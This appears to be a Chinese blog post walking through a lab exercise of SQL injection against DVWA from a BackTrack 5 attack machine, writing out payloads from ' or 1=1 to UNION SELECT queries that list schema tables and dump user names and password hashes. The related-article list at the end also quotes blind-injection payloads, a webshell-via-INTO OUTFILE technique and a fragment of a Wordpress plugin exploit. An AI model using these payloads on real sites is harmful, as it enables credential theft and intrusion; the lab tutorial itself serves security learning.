bt5制作php木马,Bt5的sql注入实例

最新推荐文章于 2021-03-27 02:12:45 发布
最新推荐文章于 2021-03-27 02:12:45 发布
阅读量118 收藏
点赞数
文章标签: bt5制作php木马

版权声明:转载原创文章请以超链接形式请注明原文章出处,尊重作者,尊重原创!

恰饭广告

任务描述:

了解sql注入方法P170

任务环境说明:

攻击机:BT5

靶机:WEB服务器

攻击机安装服务/工具1:firefox

攻击机安装服务/工具2:

攻击机安装服务/工具3:

攻击机安装服务/工具4:

实现步骤:

1.    修改安全防护级别,改成低级,并保存配置

Firefox浏览器打开dvwa后台登录地址(http://10.10.10.129/dvwa/login.php)

管理员账号和密码:admin/admin

639fed30e2cc17cfc51899b3dcf5e9e1.png

登录后台之后,对网站安全等级进行修改

14997393be10d69087b1d270ac29a374.png

a262dd7930c8dc96d1faa25cb4f5ca84.png

1e5978e01ae55fb1d0e839b333bab990.png

2.    实现图4-11的效果;

SQL注入,查看是否存在注入漏洞

bb9555693cf49c0e41179cd6fd365401.png

输入不正确字符“’”提交之后,出现以下提示信息则说明存在注入漏洞

923a37d09cf0bfb1af0da287274dcd8c.png

通过特殊编制的SQL语句进行查询,获取网站后台的所有用户及密码

b3b6fd151c0ada528ed2bda47d2139ec.png

输入特殊编制的SQL语句’ or 1=1 — ‘提交之后,获取信息如下:

3e8bad86ca5b9b3a11aa88576834bcc3.png

3.    实现图4-12的效果;

通过特殊编制的SQL语句查询更多信息

ac3fb3f9d03f0228caf6943fedae647d.png

输入特殊字符串’ union select 1,2 — ‘提交之后,获取结果如下:

3220839553909ce46375075f010d60ec.png

注意:提示说明该网站的数据表存在两列

4.    实现图4-13的效果;

输入SQL语句查询数据库更多信息’ union select 1, table_name from INFORMATION_SCHEMA.tables — ‘

78d15f36f30081d71ed0d1ad36077530.png

检索INFORMATION_SCHEMA的结果如下:

e2b98b8c2e1d4f06aeadcca01cba42cf.png

注意:判断guestbook和users为网站所使用的数据表

5.    实现图4-14的效果;

输入SQL语句’ UNION SELECT 1, column_name from INFORMATION_SCHEMA.columns where table_name = ‘users’  — ‘  列出users表的内容

5ab43eba228ea2c2cbcfc10790b25f18.png

列出users表的所有内容以后,查询到users表存在password列(密码内容)

87ca3545ab2ee6d7aaff50806b2e87dc.png

输入SQL语句’ UNION SELECT NULL, password from users — ‘列出password列的密码内容(密码为MD5值,需要转换一下)

e658a266afbda4dc19bd72ed76b9536a.png

6.    实现图4-15的效果;

使用concat函数将所有信息列出来

输入SQL语句’ UNION SELECT password, concat (first_name, ‘ ‘ , last_name, ‘ ‘ , user) from users —

60d3d4413fad7b6f1e7e5b87d487187e.png

结果如下:

d79eebea6e32967fb9433673e9dcc4d0.png

让我恰个饭吧.ヘ( ̄ω ̄ヘ)

支付宝 ——————- 微信

恰饭广告

b2fa10417bcbd2c397d3c42ce544672e.gif

廖执着
关注
php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理
weixin_39800387的博客
02-19 2389
讲一下SQL注入写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
SQL注入SQLmap简单用法,和SQL注入写入一句话木马
m0_56214376的博客
03-16 9355
SQL注入 Boolean注入攻击-布尔盲注 1' and length(database())>1 -- qwe 1’ and length(database())>10 # mysql数据库的字符串函数 substr()函数和hibernate的substr()参数都一样,但含义有所不同。 用法: substr(string string,num start,num length); string为字符串; start为起始位置; length为长度。 1’ and ascii(s
BT5里sqlmap注入
weixin_33709219的博客
07-23 162
BT5进行网站sql注入 对于一些喜欢***的朋友来讲,在进行实验时,总会遇到一些让人头痛的问题:如对于一些常见的asp网站,我们在对其进行安全检测的时候,发现网站存在注入点,可是在使用明小子,啊D,穿山甲等常用的注入点检测工具检测时发现该点可以注入,但是却找不到注入表或者找到了数据表但是找不到字段(那是因为你的数据库字典不够强大),我相信这时候很多人都苦恼了(一般的asp网站的数据库都是Ac...
bt5制作php木马,BT5下利用WordpressZingiri Plugin渗透靶机镜像wordpress -电脑资料
weixin_30015835的博客
03-21 131
Wordpress Zingiri Plugin的攻击代码如下:error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);$fileman = "wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/a...
bt5制作php木马,BT5下利用WordpressZingiri Plugin渗透靶机镜像wordpress
weixin_39626298的博客
03-21 84
$dirname = uniqid();$payload = "new_folder={$dirname}&currentFolderPath={$rootdir}";$packet = "POST {$path}{$fileman}/ajax_create_folder.php HTTP/1.0\r\n";$packet .= "Host: {$host}\r\n";$packet ....
Backtrack5 SQL注入漏洞探测
weixin_34314962的博客
10-20 143
SQLMAP,它是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限...
SQL注入攻防入门详解
ly8261861的专栏
05-20 688
转载:http://www.cnblogs.com/chorrysky/archive/2013/02/22/2922034.html 毕业开始从事winfrm到今年转到 web ,在码农届已经足足混了快接近3年了,但是对安全方面的知识依旧薄弱,事实上是没机会接触相关开发……必须的各种借口。这几天把sql注入的相关知识整理了下,希望大家多多提意见。 (对于sql注入的攻防,我只用过
SQL注入防范之防范网页木马.pdf
09-19
"SQL注入防范之防范网页木马" 在本文,我们将讨论如何防范SQL注入攻击和网页木马,以保护我们的数据库和网站安全。 防范SQL注入攻击 SQL注入攻击是一种常见的网络攻击手法,攻击者通过注入恶意的SQL代码来获取...
HTML5 CSS3 专题 :诱人的实例 3D旋转木马效果相册实例源码
07-12
在本实例,我们将深入探讨一个基于HTML5和CSS3的3D旋转木马效果相册,这是一个充满吸引力的图片展示方式,能够为用户带来独特的浏览体验。 3D旋转木马效果相册利用了CSS3的transform属性,尤其是rotateY()和...
BT5下利用ms12_004_midi漏洞进行攻击教程
10-29
利用Metasploit通过ms12_004_midi漏洞进行渗透
如何对PHP程序的常见漏洞进行攻击
zgqtxwd的专栏
05-01 180
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
bt5使用教程----主要是渗透方面
骑蜗牛散步的专栏
10-06 7320
喜欢渗透,今年8月才开始接触bt5。看到论坛上有很多帖子,但主要都是讲pj的。如果单单是pj,对于bt5真的是大才小用了。所以决定开个帖子讲讲bt5在渗透方面的应用。这个帖子的主要是根据教主的视频教程,《LiNUX--BT4hei客手册》整理,加以网上资料,也算是我个人的学习笔记了吧,有兴趣的童鞋可以和我一起走进bt5。 (ps:教主的视频教程地址:http://v.ku6.com/playli
msf生成php木马,11.7 Weevely3生成网页木马、Backcookie后门生成工具、使用msf生成木马、一句话变形技巧和使用...
weixin_36005427的博客
03-27 1943
大马:代码量大,体积大,可以和一句话木马配合使用(先传一句话后传大马),一般同意被发现,可变形或伪装(编码、远程接入),主要功能:文件管理、,命令执行、数据库管理、清理木马、屑木马、收集信息、提权等。Webshell管理工具的介绍和使用:Webshell工具主要和一句话配合使用国菜刀、国蚁剑等Weevely3生成网页木马(基于python)python weevely.py -h python...
mysql盲注脱裤_BT5下使用SQLMAP入侵加脱裤 -电脑资料
weixin_39883705的博客
02-28 2832
早就听说BT5下的sqlmap功能很强大,今天终于下决心拒绝DOTA和苍老师的诱惑,静下心来研究研究这个传说的sqlmap!由于在虚拟机里面用的 ,我直接在真机上也装了个BT5的系统,嘻嘻··,那感觉,真是流畅啊,各种不卡!简单介绍下sqlmap吧,它是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE...
BT5的xprobe2的操作实例
WEL测试
11-27 2882
xprobe2是一款远程主机操作系统探测工具。xprobe通过ICMP协议来获得指纹。xprobe2通过模糊矩阵统计分析主动探测数据报对应的ICMP数据报特征,进而探测得到远端操作系统的类型。PS:这里需要把网络连接改为桥接方式。 1.xprobe2的位置: 以下面两个命令为例: xprobe2 domain------------------以域名来扫描 xprobe2 -v -r
sql注入教程】mysql注入直接getshell
dfdhxb995397的博客
08-30 1573
Mysql注入直接getshell的条件相对来说比较苛刻点把 1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了 3:要有file权限,默认情况下只有root有 4:对目录要有写权限,一般image之类的存放突破的目录就有 在实际环境我只遇过一次,为了做实验,我把php.ini文件...
BT5入侵mssql
天元喜羊羊的博客
08-18 3643
mssql_ping: msf auxiliary(mssql_ping) > show options Module options (auxiliary/scanner/mssql/mssql_ping): Name Current Setting Required Description ---- ---
在c#的GridView使用邮件链接的方法.zip
最新发布
09-20
我们知道,在GridView可以使用HyperLinkField生成一个超链接,但是这个超链接只能是普通的http的超链接, 如果想做一个邮件的链接(mailto:user@abc.com)似乎就不起作用了。通过模板列的方式实现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值